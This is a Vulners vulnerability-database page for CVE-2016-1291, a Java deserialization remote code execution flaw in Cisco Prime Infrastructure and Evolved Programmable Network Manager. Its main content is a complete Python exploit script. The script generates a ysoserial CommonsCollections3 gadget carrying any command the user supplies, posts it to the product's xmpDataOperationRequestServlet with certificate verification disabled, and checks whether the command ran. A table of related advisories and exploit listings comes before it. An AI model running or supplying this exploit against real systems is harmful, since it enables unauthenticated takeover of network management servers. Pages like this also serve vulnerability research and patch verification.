Vulners
Lucene search
Cisco Prime Infrastructure and Evolved Programmable Network Manager 命令执行漏洞
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Exploit for Deserialization of Untrusted Data in Redhat Data_Grid | 15 Sep 202009:08 | – | gitee |
| Exploit for Deserialization of Untrusted Data in Ibm Sterling_B2B_Integrator | 3 Aug 202504:13 | – | gitee |
| Exploit for Deserialization of Untrusted Data in Redhat Data_Grid | 29 Oct 202013:31 | – | gitee |
 | CVE-2016-1291 | 11 Dec 202313:42 | – | circl |
 | Cisco Prime Infrastructure and Evolved Programmable Network Manager Remote Code Execution Vulnerability | 6 Apr 201616:00 | – | cisco |
 | Cisco Prime Infrastructure Java Deserialization RCE (cisco-sa-20160406-remcode) | 19 Apr 201600:00 | – | nessus |
 | Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager Arbitrary Code Execution Vulnerabilities | 7 Apr 201600:00 | – | cnvd |
 | Cisco Prime Infrastructure and EPNM Deserialization Code Execution (CVE-2016-1291) | 22 Aug 201600:00 | – | checkpoint_advisories |
 | CVE-2016-1291 | 6 Apr 201623:00 | – | cve |
 | CVE-2016-1291 | 6 Apr 201623:00 | – | cvelist |
10
#! /usr/bin/env python2
#Cisco Prime Infrastucture Java Deserialization RCE (CVE-2016-1291)
#Based on the nessus plugin cisco_prime_infrastucture_20161291.nasl
#Made with <3 by @byt3bl33d3r
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import sys, os
from binascii import hexlify, unhexlify
from subprocess import check_output
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
ysoserial_path = None
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP:PORT')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='https', help='Send exploit over http or https (default: https)')
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if not args.ysoserial_path:
for path in ysoserial_default_paths:
if os.path.exists(path):
ysoserial_path = path
else:
if os.path.exists(args.ysoserial_path):
ysoserial_path = args.ysoserial_path
if ysoserial_path is None:
print "[-] Could not find ysoserial JAR file"
sys.exit(1)
if len(args.target.split(':')) != 2:
print '[-] Target must be in format IP:PORT'
sys.exit(1)
if not args.command:
print '[-] You must specify a command to run'
sys.exit(1)
ip, port = args.target.split(':')
print '[*] Target IP: {}'.format(ip)
print '[*] Target PORT: {}'.format(port)
payload = 'aced0005771d001b492068616420736f6d657468696e6720666f7220746869732e2e2e'
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])
payload += hexlify(gadget[4:])
r = requests.post('{}://{}:{}/xmp_data_handler_service/xmpDataOperationRequestServlet'.format(args.proto, ip, port), verify=False, data=unhexlify(payload))
if r.status_code == 200 and 'InstantiateTransformer: Constructor threw an exception' in r.text:
print '[+] Command executed successfully'
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2016 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.02322